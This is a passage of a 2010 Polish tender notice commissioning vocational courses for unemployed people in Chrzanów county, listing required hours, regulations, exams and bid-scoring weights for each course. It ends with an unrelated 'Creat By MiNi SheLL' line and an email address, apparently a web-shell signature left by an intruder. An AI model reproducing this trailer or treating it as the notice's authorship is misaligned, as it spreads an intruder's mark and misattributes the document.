3. Program szkolenia powinien obejmować min.  245 godzin dydaktycznych. Szkolenie powinno być zgodne z przepisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia oraz przeprowadzone w oparciu o program opracowany  na podstawie  Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 sierpnia 1998r. 
w sprawie rodzajów dyplomów i świadectw wydanych przez szkoły i inne placówki oświatowe, które potwierdzają uzyskanie specjalistycznych kwalifikacji w zakresie ochrony osób i mienia, minimalnego zakresu programów kursów pracowników ochrony fizycznej pierwszego i drugiego stopnia oraz zakresu obowiązujących tematów egzaminów i trybu ich składnia, składu komisji egzaminacyjnej i sposobu przeprowadzania egzaminu  (  Dz. U. Nr 113 poz.  731.)

4.Czas trwania:  nie dłużej niż 40 dni roboczych 


5.Termin realizacji szkolenia: 

Lipiec/sierpień/wrzesień

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


6.Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadzcenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Spawacz elektryczno- gazowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: Przeprowadzenie szkolenia  dla  12 osób  bezrobotnych w specjalności : Spawacz elektryczno-gazowy 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3. Program szkolenia powinien obejmować min. 274 godzin dydaktycznych i być zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia

4.Czas trwania:  nie dłużej niż 45  kolejnych dni roboczych  


5. Termin realizacji szkolenia:  sierpień/wrzesień 2010.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


6. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216). 

Po pozytywnym zaliczeniu egzaminu uczestnicy otrzymają także Świadectwo Egzaminu Kwalifikacyjnego Spawacza wystawionego przez Instytut Spawalnictwa oraz Książeczkę Spawacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Magazynier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  15  osób bezrobotnych  w specjalności:  Magazynier.  

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.. 


3.Program szkolenia powinien obejmować  120 godzin dydaktycznych i zawierać następujące moduły: 
1.Obsługa wózka widłowego 
2.Przepisy BHP, ochrona ppoż. oraz zasady zabezpieczenia towarów w magazynie
3.Obsługa komputera i komputerowych programów magazynowych
4.Technologia i organizacja prac magazynowych
5.Zapasy magazynowe
6.Budowle magazynowe i wyposażenie magazynu. 

Moduł obsługi wózka widłowego powinien  być przeprowadzony w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie 
z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)  tj. Ośrodek Doskonalenia Kadr w Mysłowicach. 

Program powinien zawierać wskazane powyżej minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia, jednak liczba godzin nie może przekroczyć 120. 


4.Czas trwania:    nie dłużej niż 20  kolejnych  dni roboczych 

5. Termin realizacji szkolenia:  lipiec / sierpień 2010r.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


6.Sposób organizacji szkolenia: 

 Wykonawca zapewnia liczbę komputerów co najmniej równą liczbie uczestników ( na jedno stanowisko komputerowe przypada tylko jeden uczestnik ).

7.Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U.  Nr.31 poz.216). 

Ponadto w ramach szkolenia uczestnicy muszą przystąpić do egzaminu, którego celem jest uzyskanie zaświadczenia kwalifikacyjnego do obsługi wózków jezdniowych wystawionego przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Uprawnienia elektryczne do 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  20  osób bezrobotnych  w specjalności:  Uprawnienia elektryczne do 1 kV .  

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.. 


3. Program szkolenia:  musi być zgodny z przepisami rozporządzenia Ministra Gospodarki Pracy i Polityki Społecznej  z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci ( Dz. U. nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów ( Dz. U. nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki 
i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. nr 141, poz. 1189). 

4.Czas trwania:    nie dłużej niż 10  kolejnych  dni roboczych 


5.Termin realizacji szkolenia:  wrzesień 2010r.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


6.Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r 
w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych 
w formach pozaszkolnych (Dz. U.  Nr.31 poz.216). 

Ponadto szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadcznie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Fliziarz -Posadzkarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób bezrobotnych  w specjalności:  Fliziarz - Posadzkarz.  

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.. 


3.Program szkolenia powinien obejmować  200 godzin dydaktycznych i zawierać następujące. 

1.	Materiałoznawstwo.
2.	Dokumentacja techniczna.
3.	Technologia robót.
4.	Rysunek zawodowy.
5.	Bezpieczeństwo i higiena pracy.
6.	Stosowanie bezpiecznych metod pracy.
7.	Wykonywanie posadzek cementowych wylewanych na mokro.
8.	Wykonywanie posadzek z tworzyw sztucznych i wykładzin tekstylnych.
9.	Wykonywanie posadzek z płytek ceramicznych.
10.	Zajęcia praktyczne - min. 100 h.

Razem ilość godzin: 200.

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia jednak liczba godzin nie może przekroczyć 200. 

4.	Czas trwania:  nie dłużej niż 30  kolejnych dni roboczych  


5. Termin realizacji szkolenia:  sierpień/wrzesień 2010.

Dokładny  termin  realizacji zostanie  określony w umowie szkoleniowej. 


6. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.75</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. Certyfikaty jakości usług - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com